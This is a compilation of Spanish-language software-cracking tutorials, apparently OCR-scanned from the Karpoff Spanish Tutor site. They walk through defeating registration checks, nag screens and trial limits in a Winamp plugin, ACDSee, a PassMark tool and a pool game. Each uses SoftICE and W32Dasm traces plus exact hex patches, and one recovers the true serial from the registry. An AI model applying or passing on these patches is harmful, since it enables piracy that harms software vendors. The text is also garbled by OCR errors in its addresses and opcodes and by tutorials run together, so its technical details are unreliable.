la razón de no haberlo encontrado es porque, es que los plugins son archivos *.dll que 
winamp carga en su carpeta de plugins. 


además también busque en este archivo in_nicemc.dll, y no encontre nada, es por eso que 


vamos al softice, el nos dara una pista. para que noten no todo esta en los archivos *.exe, 
como algunos ven en los tutoriales que han leído. 


pasos: 
1% reiniciar a (fancy), su pc para cargar softice. 


2% antes de hacer cualquier cosa, talvez no veas el archivo in_nicemc.dll en tu pc. para 
debes de ir a en cualquier ventana de windows o hacer doble clic a mi pc del menu de 
herramientas clic en "ver", "opciones de carpeta" -> planilla "ver" clic "mostrar todos los 
archivos" y aceptar. 


3% carga el archivo in_nicemc.dll en el w32dasm y espera, o bien abre tu proyecto 
in_nicemc.alf si lo guardaste como proyecto y listo ahí esta. 


4% abrir el loader32 (softice) y cargar winamp. 
5% clic en load el icono de las tuercas y clic en si. 
6% clic "f5", vez que se cargo winamp. 


7% haz clic en play te aparecera el nag, entra a "enter registration code", e introduce 
datos en "name" y "key code" y no presiones todavía "ok" 


8% realiza un control+d para volver al softice y coloca un bpx messageboxa y enter luego 
"eb" la 


9% ahora si puedes presionar "ok", vamos sin miedo. 
10% saltamos al softice, ahora debes estar viendo 
user32! messageboxa 

XXXX:XXXXXXXX 55 push ebp 


11% presiona "f12" y volveras a windows y te mostrara el mensaje de error haz clic en 
aceptar y volveras al softice, en realidad al lugar de donde se llamo al mensaje de error: 


* reference to: user32.messageboxa, ord:01c3h 


¿XXXxX75af ff1570484610 call dword ptr [10464870] <- este llama al mensaje de error "bueno en 
softice aparecera" como sigue 


025f£:029c75c7 ff157048e202 call [user32!messageboxa] 


si buscas estas direcciones en el archivo de winamp desemsamblado no lo encontraras, como te 
dije este se encuentra en el archivo *.dl1l el plugin. 


¿XXXxX75b5 eb16 jmp 100075cd 
* referenced by a (u)nconditional or (c)onditional jump at address: 


| :xxxx759d (c) 


:Xxxx75b7 6a00 push 00000000 


para que te ubiques mejor ve al w32dasm 


y en goto code location escribe 100075af 


:1000757b 830404 add esp, 00000004 

:1000757e a314d30210 mov dword ptr [1002d314], eax 
:10007583 al14ad30210 mov eax, dword ptr [1002d314] 
:10007588 50 push eax 

:10007589 68c0350e10 push 100e35c0 


:1000758e e8e79dffff call 1000137a <- este llama a la rutina de comprobación del serial, 
debes entrar a este para estudiarlo, pero como lo estudie, te lo explicare. 


:10007593 83Cc408 add esp, 00000008 


:10007596 833d18d3021000 cmp dword ptr [1002d318], 00000000 <-— este compara la comprobación 
del registro si es valido o no 


:1000759d 7418 je 100075b7 

:1000759f 6a00 push 00000000 

:100075a1 685c940210 push 1002945c 

:100075a6 68e8930210 push 10029388 

:100075ab 8b4d08 mov ecx, dword ptr [ebp+08] 
:100075ae 51 push ecx 


* reference to: user32.messageboxa, ord:01c3h 


:100075af ff1570484610 call dword ptr [10464870] 
:100075b5 eb16 jmp 100075cd 


explicación 


:1000758e e8e79dffff call 1000137a <- aquí debes entrar presiona el boton "call" si estas 
con softice presiona "f8" 


* referenced by a Call at addresses: 


|:10006582 , :1000758e , :10007£06 


:1000137a e9%el0a0000 jmp 10001e60 <-—aquí apareces ahora presiona "jump to", si estas en 
softice "f10 o f8" 


* referenced by a (u)nconditional or (c)onditional jump at address: 
| :1000137a (u) 


:10001e60 55 push ebp <-aquí apareces 

:10001e61 8bec mov ebp, esp 

:10001e63 83ec48 sub esp, 00000048 

:10001e66 53 push ebx 

:10001e67 56 push esi 

:10001e68 57 push edi 

:10001e69 c745f800016201 mov [ebp-08], 01620100 

:10001e70 c745£fc00000000 mov [ebp-04], 00000000 

:10001e77 eb09 jmp 10001e82 <- colocate aquí y presiona "jump to", si estas en 


softice "f10 o f8" 


* referenced by a (u)nconditional or (c)onditional jump at address: 

| :10001e77 (u) 

:10001e82 8b4d08 mov ecx, dword ptr [ebp+08]<-aquí apreces baja más 
:10001e85 51 push ecx 


* reference to: msvcrt.strlen, ord:02beh 


:10001e86 e851570100 cal1 100175dc <- si estas en softice presiona "f10", para no entrar a 
la llamada 

:10001e8b 830404 add esp, 00000004 

:10001e8e 3945fc cmp dword ptr [ebp-04], eax 
:10001e91 7341 jnb 10001ed4 

:10001e93 8b5508 mov edx, dword ptr [ebp+08] 
:10001e96 0355fc add edx, dword ptr [ebp-04] 
:10001e99 0Ofbe02 mMOVSX €eax, byte ptr [edx] 
:10001e9%c 83e801 sub eax, 00000001 

:10001e9f 8b4d08 mOvV ecx, dword ptr [ebp+08] 
:10001lea2 034dfc add ecx, dword ptr [ebp-04] 
:10001lea5 Ofbe11 movsx edx, byte ptr [ecx] 
:10001lea8 83c202 add edx, 00000002 

:1000leab Ofafc2 imul eax, edx 

:10001leae 8b4d08 MOV ecx, dword ptr [ebp+08] 
:10001eb1 034dfc add ecx, dword ptr [ebp-04] 
:10001eb4 Ofbe11 movsx edx, byte ptr [ecx] 
:10001leb7 83c205 add edx, 00000005 

:1000leba Ofafc2 imul eax, edx 

:1000lebd 6bc009 imul eax, 00000009 

:10001ec0 8b4df8 MOV ecx, dword ptr [ebp-08] 
:10001ec3 8d5401f2 lea edx, dword ptr [ecx+eax-0e] 
:10001ec7 8955£8 mov dword ptr [ebp-08], edx 
:10001leca 837dfc0c cmp dword ptr [ebp-04], 0000000c 
:10001lece 7502 jne 10001ed2 

:10001ed0 eb02 jmp 10001ed4 <- colocate aqui y presiona "jump to", si estas en 


softice "f10 o f8" 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 

| :10001e91 (c), :10001ed0 (u) 

:10001ed4 8b45f8 mov eaxX, dword ptr [ebp-08] <- aqui apareces baja 

mucho ojo aqui, como oi por ahi, pon ojos de buho, super abiertos 

:10001led7 3b450c cmp eax, dword ptr [ebp+0c] <- si estas con softice, coloca esto en la 
ventana de comandos: 


? eax y enter, anota el numero en decimal que aparece, borra todos los bpx (bc*) y "f5", 
coloca el mismo nombre que colocaste anteriormente y el numero de registro que anotaste. 


:10001leda 750a jne 10001ee6 <- aquí puedes modificar con el editor hexadecimal, su offset es 
leda cambiar 75 por 74 (je 10001ee6), solo para practicar y te dara buenos resultados, es 
decir no saltara. 


:10001ledce c7051843021001000000 mov dword ptr [1002d318], 00000001 <-— aquí saltara si 
modificas con el editor y tomara tu serie como válido. 


listo eso es todo, si seguiste bien con softice, o w32dasm podras notar que no es tan 
complicado hacer un keygen haber si lo logras, te ayudara mucho para aprender el lenguaje 
ensamblador, yo lo haré pero me llevara un poco de tiempo, mientras disfruta de este plugin, 
como yo en este momento. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Serial, y una nag, molestosa aparece Cada cierto numero de 
PROTECCION: O a ; 

imágenes mostradas, recordándonos que debemos registrarnos. 

. . Programa para ver imágenes, *.bmp, *.Jjpg, *.gif, etc, se los 

Descripcion: ! = 

recomiendo muy bueno, en español 
Dificultad: Principiante 
DOWNLOAD : http://www. acdsystems . com/es/products/acdsee 


SoftICE cualquier versión yo utilizo la ver. 3.25 


W32Dasm Ver 8.93 (Opcional) 
Hworks32 editor hexadecimal (Opcional) 


Herramientas: 


introduccion 


después de varios estudios, a los cracks, tuve una idea, como dijeron que existen 
muchas maneras de crackear, me puse a ver este programa y a ver si podía hacerlo de 
manera diferente al ya explicado y lo logre, es una manera de practicar, vamos 
inténtalo. 


como siempre se ha dicho, primero estudiemos el comportamiento del programa, 
notamos que en la ventana aparece un mensaje de [no registrado], vamos al menu 
"ayuda" y clic "en acerca de acdsee 32", vemos una nag, la misma que molesta 
cada vez que vemos una cantidad de imágenes con el, ahora haz clic, en 
"registrese hoy", y aparece la ventana de registro llena datos y "ok", aparece 
un mensaje, este mensaje es un [messageboxa], puedes usarlo con el softice, una 
manera, de no estar adivinando, es usando apis 32, una utilidad que te muestra 
cual fue la ultima llamada de apis de windows que se hizo, y que función, en 
este Caso me devolvió [messageboxa], y esta en la dirección xxxx:4095f3. 


coloca este mensaje como control+d, bpx messageboxa en softice, antes de 
presionar "ok", después salte del softice, y ahora si "ok", estamos en softice 
presiona "f12", para saber que parte del codigo envio este mensaje: 


025£:0044a4fd call [user32! messageboxa] <- este llamo al mensaje de error 


XXXX:XXXXXXXX pop edi fl aquí apareces después de presionar "f12" 
XXXX : XXXXXXXX add esp,00000100 


bueno para, ubicarnos mejor vamos al w32dasm y cargamos el programa vamos a esa 
dirección, recorremos arriba en el codigo, en realidad es adelante, y buscamos 
alguna pauta, como un "je" un salto condicional, pero no encontramos nada, 
vamos de nuevo al softice, ten en cuenta que aun debe estar "bpx messageboxa", 
hacemos lo mismo presionando "ok", en la ventana de registro, y saltamos de 
nuevo, al codigo de arriba, presionamos de nuevo "f12", y saltamos al codigo 
que hizo esa llamada: 


:004591b1 eSeal2ffff call 0044a4a0 fl este hizo la llamada para el error 
:004591b6 83c414 add esp, 00000014 fl apareces aqui 

subimos un poco con el softice, y vemos una comparación y salto sospechosos aquí: 
:00459121 eSfaefffff call 00458120 fl este verifica el serial 

:00459126 83f£801 cmp eax, 00000001 fl compara si serial es verdadero 
:00459129 7543 jne 0045916e fl si no lo es salta 

:0045912b alb4045000 mov eax, dword ptr [005004b4] 

:00459130 8b3d18045000 mov edi, dword ptr [00500418] 


ahora debemos profundizar esto, es decir entremos a la llamada para ver donde, pone eax en 
1, tambien podíamos cambiar el jne por je, pero en realidad saltamos al mensaje de si 
registrado cuando en realidad no lo estamos asi que esto no sirve, es por eso que debemos 
profundizar el call 00458120. antes debes hacer bc 0 para borrar el messageboxa, ya no nos 
sirve. 


después de ingresar a esa call ya saben con "f8", presionen "f10" para trazar el codigo, 
hasta aquí: 


:0045816e 51 push ecx 

:0045816£ 53 push ebx 

:00458170 56 push esi 

:00458171 50 push eax 

:00458172 e8391c0000 call 00459db0 fl este call pone a eax=0 
:00458177 83c410 add esp, 00000010 
:0045817a 85c0 test eax, eax 

:0045817c 740£ je 0045818d fl este salta 
:0045817e 5f pop edi 

:0045817f 5e pop esi 

:00458180 5d pop ebp 

:00458181 b801000000 mov eax, 00000001 
:00458186 5b pop ebx 

:00458187 830424 add esp, 00000024 
:0045818a c20c00 ret 000c 


bueno ahora ponemos un bpx en 458172 para ver que hace, luego cierra el programa, vuelve a 
ejecutar el programa, notaras que siempre que cierras y ejecutes el programa, siempre 
llamara a esta instrucción: 


:00458172 e8391c0000 call 00459db0 fl este call pone a eax=0 


mi logica es que este es el que comprueba en serial siempre, asi que vamos a nopear, es 
decir vamos al editor hexadecimal, al offset 58172 


y Cambiamos e8 39 1c 00 00 por 90 90 90 90 90, y listo estamos registrados. 


para todos aquellos que quieran, dar ideas, consultar, o trabajar en grupos ayudándonos, 
aquí pueden encontrarme: 


mi correo: 


dyfredtlettera.net bueno pero este cambiara más adelante 


mi número de icgq (yo utilizo el icgq2000a) 


79406190 aquí seguro me encuentran los sabados desde 11:00pm a 12:00, estoy muy limitado de 


navegar. :( 


bueno tengo otros tres cracks tambien ya realizados pero me falta tiempo para, 
transcribirlos de seguro la proxima semana estaran ya listos para ustedes, pasare a 
describir a los programas que he modificado: 


windowsfx: programa 
más, pero tiene más 


http: //www.stardock. 


para hacer hecer que tus menues sean transparentes, en esto se destaca 
utilidades. 


com/products/windowfx/download.html 


winrar: el programa 


y el otro que no me 
crackme. 


karpoff spanish tutor: 


que tiene de evaluación 40 días. para windows 98 ya lo conocen. 


acuerdo porque lo hicimos en Casa de un amigo, es lo ustedes llaman 


pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


INTRODUCCION 


Muy buenas una vez más, otra vez estoy aquí, pero esta vez como miembro del grupo [K-FoR], así que os invito a 
que paséis por nuestra página, http: //pagina.de/kfor, no os defraudará. 


A parte de las herramientas arriba mencionadas, para el último retoque voy a utilizar el Exescope. Aunque esta 
última parte no es obligatoria, no viene mal pasar un buen rato ;-) 


preliminares. obtener información 


lo primero como siempre es saber de que va el tema. ejecutamos el programa, y nos recibe una ventanita de registro, donde 
si no ponemos nada, podemos continuar, y si metemos unos datos al azar, aparece una ventana diciéndonos que nos hemos 
equivocado. 


vamos a la ayuda, y allí nos dicen que el programa dura 30 días, pero además, sólo tenemos 15 minutos en cada ejecución. 


bueno ya sabemos que tenemos que intentar hacer, ahora nos queda saber si el ejecutable está empaquetado o encriptado, 
a parte del compilador. utilizamos la herramienta que queramos, ya sea gettyp, file analizer, file inspector, etc..., y nos dice 
que no está encriptado, ni empaquetado, y que el compilador es visual c++ 5.0. por ahora ningún problema. 


tened preparado softice, porque vamos a empezar con él. ( y continuaremos y acabaremos con él) 


la nag inicial 


este tipo de ventanitas al inicio son muy comunes, si quieres puedes continuar, sin meter el código. además suele pasar que 
al eliminar la ventana, eliminas la protección, porque ésta se suele basar en que ya no te deja dar a continue. el método que 
yo suelo utilizar se reduce a lo siguiente: encontrar el call donde se llama a la ventana, hacer que pase por él cómo si 
hubiesemos pulsado el botón de continuar. 


vamos a por ella, iniciamos el programa y nos sale la ventanita. esta vez he decidido entrar en ella con los window 
messages, concretamente con wm_destroy. es decir cuando destruyamos la ventana softice saltará. pero primero hay que 
saber que ventana es, vamos a softice (ctrl+d), y si no sabemos el nombre del ejecutable introducimos el comando task, y 
nos aparecerán todos los programas que están funcionando en nuestro ordenador. hay está, bit, éste es. ahora tenemos que 
saber cuál es el handle ('manejador') de nuestra ventana, para ello está el comando hwnd + tarea, donde tarea es el 
nombre de nuestro ejecutable, en este caso, hwnd bit, y nos aparece un listado con las ventanas que tiene en este 
momento nuestro programa, con sus respectivos botones, la que aparece en primer termino suele ser la que estamos 
buscando. en este caso a mi me sale esto: handle: 4c0(1) , fijaos que bajo class-name aparece ++32770 (dialog), y a 
continuación se ramifican los botones y otras cosillas. como observación, si nos interesase que saltase al pulsar un botón, en 
lugar de wm_destroy, utilizaríamos wm_ command, sería exactamente igual, salvo que el handle continuaría siendo el de la 
ventana a la que pertenece el botón, no el del propio botón. es decir, que en este caso sería 4c0. 


una vez tenemos el handle, que será distinto en vuestros ordenadores (incluso de una vez para otra), tenemos que poner el 
breakpoint correspondiente, un kbmsg + handle + windowmessage, en este caso sería, bhmsg 4c0 wm_destroy. ya 
está, salimos de softice y pulsamos a continuar y .... 


...Salta softice, vamos pulsando f12 hasta que aparezca en la línea verde bit, y aparecemos en: 
* reference to: user32.dialogboxparama, ord:0093h 


:00408995 ff1580124100 call dword ptr [00411280] 
:0040899b 56 push esi  <- aquí es donde aparecemos. 
:0040899c 8bf8 mov edi, eax 

:0040899e e868ba0000 call 0041440b 

:004089a3 830404 add esp, 00000004 

:00408946 85ff test edi, edi 

:004089a8 751c jne 004089c6 


podríamos seguir con f10 hasta encontrar un ret, para ver de donde venimos, pero en este caso es más cómodo pulsar una 
vez más f12, por momentos parece que no va a volver a softice, pero de pronto vuelve a romper y ahora aparecemos aquí: 


* referenced by a call at address: 
1:0040148c 


* possible stringdata ref from data obj ->"2" 


:00408560 c70508fc4200084f4200 mov dword ptr [0042fc08], 00424f08 

:0040856a c70504fc420000000000 mov dword ptr [0042fc04], 00000000 

:00408574 e897000000 call 00408610 

:00408579 83f801 cmp eax, 00000001 <- aquí aparecemos esta vez. realmente interesante ¿no? 
:0040857c 7501 ¡ne 0040857f <- aún más interesante que antes, jeje. 

:0040857e c3 ret 


bueno aquí ya vemos algo interesante, vemos una comparación de eax con 1, y si no es igual salta, interesante. antes de 
nada, para asegurarnos que este es el call, ponemos un breakpoint sobre él, bpx 408574. ahora vamos hasta el salto, y 
vemos que efectivamente no va a saltar, ya que eax=1 (sino os aparece el valor del registro eax, o el del resto de registros 
pulsad f2 y aparecerán todos). pero como somos muy curiosos, vamos a cambiar el salto, vamos a hacer que salte, con el 
comando r fl z, que cambia la flag cero. una vez cambiado, pulsamos f5, y vemos como nuestro programa se cierra, es decir 
que si eax es distinto de uno vamos a la mierda. 


volvemos a ejecutar el programa, y nos salta nuevamente softice, si queremos ver si ya a saltado la ventana, podemos pulsar 
f4, que nos permite ver que pasa por windows, vemos que no ha aparecido la ventana, es decir esta es nuestra llamada. si 
miramos los valores del registro, podemos ver que eax ya vale 1, esto nos da ganas de nopear el call, pero quién sabe si en 
algún momento, eax no vendrá aquí con valor 1, así que para asegurarnos, lo que vamos a hacer es meternos en el call, 
poner eax a cero, luego añadirle uno, y finalmente salir del call nuevamente. si nopeásemos el call, podríamos ver que todo 
va perfectamente, pero a mi no me va mucho. 


vamos a hacer lo que dije antes, vamos a meter todas las instrucciones en el call. hay dos opciones: 


(a) podemos escribir sobre el propio código en 408610, pero primero tenemos que saber su offset, para ello podemos 
utilizar el wdasm, el krackpe, o el propio file inspector de viper. el caso es que el offset es 8610. ahora hay que tener claro 
que instrucciones vamos a poner y cómo ponerlas: 


instrucción en bytes 

Xor eax, eax 31c0 <-- eax=0) 
add eax, 01 83c001  <-- eax=1 
ret c3 <-- salimos del call 


dicho esto, vamos al editor hexa e introducimos los nuevos bytes en 8610. y ya no nos volverá a aparecer la dichosa nag, y 
además ya hemos eliminado el límite de 30 días, probab a adelantar la fecha a un par de meses, jeje. 


(b) escribir en una zona vacía de nuestro ejecutable. esto es lo que a mí me gusta más, pero a parte de las instrucciones 
anteriores necesitamos tener el nuevo call de llamada. en 421150 hay bastante espacio vacío, su offset es 21150. aquí será 
dode metamos las instrucciones anteriores. pero en 408574 (offset 8574) hay que cambiar call 00408610 por call 
421150. este último se escribe así: e8d78b0100. (en otros tutoriales he explicado cómo se puede sacar esto) 


por tanto lo que ha que hacer con el editor hexa es ir a es 8574, y poner e8d78b0100, y en 21150 poner 31c083c001c3. y se 
acabó. 


limitación de 15 minutos 


podemos hacerlo de dos formas, una es pulsar el botoncito de ok y esperar 15 minutos haber que pasa, y otra es buscar en 
el wdasm algo que nos pueda ayudar. ya sea por ejemplo buscar, O000000f (15 hexa), d2f0 (15*60*60 en hexa), etc... O 
alguna frase que nos pudiese ayudar. si vamos a configuration y de ahí a test preferences, podremos ver que hay un 
apartado en el que le podemos decir el tiempo que queremos que esté funcionando, por defecto aparece el 15. si metemos 
por ejemplo16, y le damos a ok nos aparece esta ventanita: 


Sorry - See the Online help for registration details 


O 


OR 


bueno, ya tenemos nuestra frasecita. si la buscamos en el wdasm, aparecemos aquí: 


:004069f9 89442454 mov dword ptr [esp+54], eax 

:004069fd 742f je 0O406a2e <--- si saltásemos aquí evitaríamos problemas ;-) 
:004069ff 83£801 cmp eax, 00000001 

:00406402 7c05 jl 00406409 

:00406a04 83f80f cmp eax, OO00000f <- ¡¡¡ qué tenemos aquí !!! 
:00406407 7e38 jle 00406241 


* referenced by a (u)nconditional or (c)onditional jump at address: 


|:00406a02(c) 


| 
:00406409 8b1578784200 mov edx, dword ptr [00427878] 


:00406a0f 6240 push 00000040 


* possible stringdata ref from data obj ->''sorry - see the online help for " 
->"registration details" 
| 


:00406a11 6858464200 push 00424658 


* possible stringdata ref from data obj ->'the shareware auto stop period " 
->'"must be between 1 and 15 min." 
| 


:00406a16 6814454200 push 004245f4 


vaya, parece una zona más que interesante, ahí tenemos el 15 (0000000f) que dije anteriormente. sólo tenemos que cambiar 
el 74 por eb en 4069fd, es decir, cambiar je por jmp. supongo que eso ya lo sabréis hacer, así que lo dejo en vuestras 
manos. 


retoques finales 


aunque el grueso del trabajo ya está realizado, aún quedan cosas por ahí que nos indican que no estamos registrados. como 
son: 


- NOS aparece evaluation version. (1) 

- en el menú about nos ponen lo de los días y también nos pone serial +* - >evaluation. (2) 

a parte de esto, hay otras cosas que quizás en la versión registrada no desaparezcan, pero que podemos eliminar: 
- en el menú help, nos aparece register software. (3) 

- y en la barra de tareas, nos aparece el icono de la llave para registrarnos. (4) 


para (1) y (2) es exactamente igual, vamos a wdasm, buscamos las frases correspondientes, evitamos los saltos u obligamos 
a hacerlos, según corresponda en cada caso, esto creo que lo sabréis hacer así que os lo dejo a vosotros. 


sin embargo si buscamos (3), veremos que no podemos evitar que lo escriba, así que no seería necesario eliminarlo. 


como ya he dicho esto no es obligatorio, pero vamos a pasar un buen rato y el que no conozca exescope se sorprenderá. 
vamos allá: 


abrimos nuestro ejecutable en exescope, nos aparecen tres opciones: header, import y resource. a nosotros nos interesa 
resource. 


nos metemos en resource, vamos a menu, y pinchamos sobre lo que aparece. ahora en la ventana de la derecha nos han 
aparecido todas las opciones del menú del programa, únicamente debemos ir a register software, pulsar con el derecho sobre 
él y dar a delete. fuera register. 


para el (4), lo único que he visto es lo siguiente, si alguien encuentra otra cosilla que me lo diga: vamos a resource, ahora a 


bitmap, damos a 117 y aparece lo siguiente: 
y 1112 


hay está nuestra llave, exportamos la imagen y la modificamos. podemos borrar la llave o poner otra imagen encima, y luego 
la importamos de nuevo, como por ejemplo: 


Y, 
AN 


2 OO. 101112 


y tendríamos nuestro botón particular. si queremos que vaya a otra página que no sea la de comprar el programa, sólo tenéis 
que buscar en el editor hexa http: //www.passmark.conysales (como ansi string), y poner lo que queráis, yo he puesto 


conclusiones 
deshabilitar botones y muchas otras cosas. 


esto último no sirve para mucho, pero quería que viéseis la capacidad de exescope, de como nos puede ayudar a habilitar o 


con la diversión que esto supone por supuesto ;-)) 


bueno se acabó, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna pregunta no dudéis en 
decirmelo. espero que os haya resultado útil este tute. no olvidéis que nuestro objetivo sólo es aprender. sin contar 


me gustaría aprovechar la ocasión para agradecer a todos los que me han ayudado a meterme en este apasionante mundillo, 
todos los miembros de [k-for]. 


que han sido muchos, a todos ellos los mando un gran saludo y les doy las gracias. en especial un gran saludo a karpoff y a 
hasta la próxima... 


«oo z=ézeona » 


mi correo: kuato_thortdhotmail. com 


la página de [k-for]: http: //pagina.de/kfor 
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sobre 


Karpoff Spanish Tutor 


Dificultad: Muy Fácil. 


introduccion 


hola a todos! en primer lugar me presentaré soy john keeper un newbie bastante torpe pero que con un poco 
de ayuda de los grandes (mOniac_pc,profesor_x,karpoff argenbyte,y muchos +)ha conseguido dar sus 
primeros pasos en esto del cracking. aprovecho para dedicar este tutorial a whistler (diseñador gráfico de la 
ostia,creedme), x-faktor (compañero de aventuras), y a mis amigas luzma, patry, laura y mariceli (ctd), así 
como también a whickerman y a kevenant. bueno a lo q interesa, el programa al q nos enfrentamos es un 
¡juego de billar con unos gráficos un poco pobres, aunq ya se sabe q para pasar el rato cualquier cosa sirve ;p. 
tiene un sistema de protección muy simple y fácil de comprender, por eso ( y q no sirva de precedente) vamos 
a crackearlo con el w32dasm y luego vamos a buscar el serial con el soft-ice,aunq cuando hayamos crackeado 
el programa con el w32dasm no hará falta el soft-ice para averiguar el serial puesto que los señores q por lo 
visto se han encargado de la seguridad, tenían partida de póker esa noche y dejaron el trabajo a medio 
terminar para irse pronto, y al crackear el programa aparece grabado en el registro de windows el verdadero 
serial,unos fenómenos vaya. aprovecho también para deciros q no soy más q un newbie con pocos 
conocimientos, pero q me he decidido a colaborar con karpoff y ayudar a iniciarse en esto a todo el q quiera, 
de hecho es mi primer tutorial y está escrito en términos muy fáciles (principalmente porq yo no tengo mucho 
nivel en esto), q todos podemos entender, así q señores maestros de cracking perdónenme por los errores 
aberrantes q de seguro cometeré al hacer referencia a algo. y también aprovecho para animáros a q escribáis 
vuestros propios tutoriales, venga q se vea lo q sabéis. 


en primer lugar abrimos el programa y vemos que nos aparece la siguiente nag screen(ventana de aviso o información): 


Order Information 


nos larga un lío de miedo y en la parte inferior de la ventana aparecen 3 opciones (leo de izquierda a derecha) fax/print order form 
para imprimir o enviar por fax el pedido del juego,el botón ok que es para pasar de rollos y ponerte a jugar, aunq verás q no puedes 
usar algunas modalidades de juego,lo cual lo hace todavía + malo, y nuestra opción enter registration code, le pegamos al botón 
(como dice el profesor_x) y nos aparece lo siguiente: 


Ok fale entonces, metemos nuestro número de serie, en mi caso 4041984 (la fecha de nacimiento de alguien especial para mí ,aunq 
como es para probar meted lo q os de la gana ; p), y acto seguido pulsamos ok y ... 


casi!, hombre creo q no esperaríais q funcionase, por ahora ...copiaremos lo q nos dice esta ventana de aviso y proseguiremos.de 
acuerdo entonces,antes de nada debemos hacer una copia de seguridad del fichero en cuestión(pool.exe) antes de comenzar a trabajar 
con el programa,lo habéis hecho ya? bien pues entonces arrancamos nuestro amigo el w32dasm y abrimos nuestro fichero en 
cuestión pool.exe, tras un momento + ó - breve dependiendo de vuestro ordenador, tendremos en pantalla el fichero abierto, ahora le 


damos al botón strref [Es una vez aquí observaremos con atención... 


W32Dasm List of String Data ltems 


"Straight" 

"Successl" 

"SAW" 

"Ten Ball" 

"THE ABOUT NUMBERS ARE FOR CREDIT " 
"THE AUTHOR OF THIS PROGARA4M CANNOT " 
"the following ways:" 

"The Registration Code you entered ** 


"The shareware version of Challenge " 
"This is the shareware version * 
“Timezd" 

"To insure that you get the later " 


buscamos en la ventana de diálogo algo parecido a lo q nos decía la ventana de error al tratar de registrarnos, y encontramos la string 
reference de la nag screen correspondiente. una vez la localizamos hacemos doble click sobre ella hasta aparecer en algo aberrante 
como esto: 


* Referenced by a (U)inconditional or (C)jonditional Jump at Address: 


1:00411885(0) 

l 

00411880 3309 xXOr ecx, ecx 
:0041188E 85C0 test eax, eax 
:00411890 OF95C1 setne cl 
:00411893 8409 test. el, el 
:00411895 7410 je 00411847 
:00411897 6400 push 00000000 
:00411899 6A00 push 00000000 


* Possible StringData Ref from Data 0bj ->»"The Registration Code you entered " 
=>"is not correct, please try again." 


00411840 ES23D?0100 call 0042EFCS 
00411845 EB35 jmp 004118DC 


impresiona verdad ?bueno, pues no nos dejemos intimidar por este trozo de código, si os parece vamos analizarlo... aparecemos en 
una línea q no sabemos q narices significa,no? bueno tómatelo con calma sabeis leer, no es cierto? encima de la línea resaltada pone 
algo como esto "the registration code you entered is not correct please try again" más arriba de esto pone: 


:0041188C 3309 xoOr ecx, ecx 
:0041188E 85C0 test eax, eax 
:00411890 OF95C1 setne cl 
:00411893 84C9 test cl, cel 
:00411897 6A00 push 00000000 
:00411899 6400 push 00000000 


* Possible StringData Ref from Data 0bj ->"The Registration Code you entered " 


=>"is not correct lease t again." .z En ¿ 
; sl de ajá!lun comprobación y después 


un salto condicional, os explico, el programa aquí lo q hace es comprobar si el serial q introdujimos es el correcto, de eso se encarga 
la orden test cl,cl , abajo de ella vemos q hay un salto condicional del tipo je(jump 1f equal) salta a otra zona del código(la de 
registrados)si el código q introdujímos es igual al verdadero entonces se aleja de la rutina de creación de ventana de error ,en caso 
contrario sigue 'leyendo' y llega a la famosa rutina de la ventanita,q hacer?cómo no se os ocurre nada?fácil, nosotros haremos q el 
programa acepte nuestro serial como correcto inviertiendo la comprobación, de forma q acepte por válidos los códigos incorrectos, 
pero tiene un inconveniente q es q el único código q no servirá será el verdadero. un poco chungo, no?mejor haremos q tome todos 
los códigos por válidos : ). para eso apuntamos su offset(si esq no estoy confundiendo palabras ya)de todas formas apuntamos ese 
numerito tan raro q aparece abajo 


vale pues en ese numerito tan raro va contenida la dirección correspondiente al salto q nos lleva a donde no queremos y q vamos a 
invertir.ok pues una vez q lo tenemos cerramos el w32dasm y arrancamos el hackers view una vez aquí vamos navegando por las 


carpetas de nuestro disco duro hasta la q contiene la copia de seguridad q hicimos, cuando lo localicemos lo abrimos, veréis q salen 
un follón de cosas sin sentido,no? ok pues pulsemos f4 y escogemos la última opción (o pulsamos 2 veces enter como dice x-faktor) 
una vez ahí vemos q lo q no tenía mucho sentido comienza a parecerse un poquito a la pantalla de nuestro amigo el 
w32dasm,verdad? vale pues ahora pulsamos la tecla f5 y escribimos el numerito raro de antes, ya sabéis 10c95 y pulsamos enter. 
aparecemos ahora exactamente en la misma línea del código q vimos con el w32dasm y q contiene el salto je q vamos a convertir en 
un jmps q es un salto q se realiza siempre sin tener nada q ver con la validez del código, para eso cambiamos el 7510 por eb10 
pulsando para ello f3 y una vez q hemos cambiado los datos le damos a f9. salimos del hackers view y arrancamos la copia 
modificada,introducimos cualquier serial q nos de la gana y ... 


bueno pues el programailla ha sucumbido ante nuestra superior inteligencia ; p, de todas formas no ha sido uno muy dificil, es el 
primero q conseguí crackear tras leer toneladas de manuales sobre cracking de todos los q se dignaron en escribir para nosotros los 
newbies. ok entonces pues ahora vamos a hacer los mismo pero sin modificar nada del programa, usando el soft-ice yo tengo la 
versión 4.05 q cogí de la página de karpoff, aunq también lo puedes encontrar en miles de sitios más. bueno pues lo q ahora vamos a 
hacer es usar una herramienta q windows nos sunministra, pero q no está al descubierto, para ello nos vamos al menú inicio, ejecutar 
y tecleamos regedit y nos aparecerá algo así... 


'' Editor del registro de configuraciones 


E- 8) Mi PC 
aa HKEY_CLASSES_ROOT 
0-3 HKEY_CURRENT_USER 
2 AppEvents 
(3 Control Panel 
(3 InstalllocationsMRU 
(2 keyboard layout 
3 Network 
a Software 
4-43 Arachnophilia 
(3 Audio Explosion 
1-3 Babylon 
61-43 BreakPoint 
ea Challenge Pool 
Sa 


[ab] (Predeterminado) [valor no establecido] 
(ab] Code "122-167" 


nos metemos en la carpeta q hace referencia a challenge pool y vemos otra dentro de dicha carpeta,pero vemos algo más, una clave 
de registro q dice 'code', pero vemos algo q no cuadra, no es ese el serial q introdujimos!!! el programa guarda en el registro de 
windows el verdadero serial xdddd, desde luego los encargados de la seguridad del programa no estaban muy interesados en 
preservar el verdadero serial,no creeis?bien pues ahora lo q hacemos es pinchar con el botón derecho en la clave q pone code, y la 
borramos, ahora el programa ha vuelto a dejar de estar registrado y listo para q ataquemos con nuestro compañero de peripecias el 
sice. bien después de haberle dado al symbol loader del sice y haber cargado el programa nos saldrá un error, no me pregunteis a q 
se debe porq no lo sé, pero si sé q no afectará para nada en nuestro trabajo.le damos a enter y aparece el sice en pantalla, pulsamos f5 
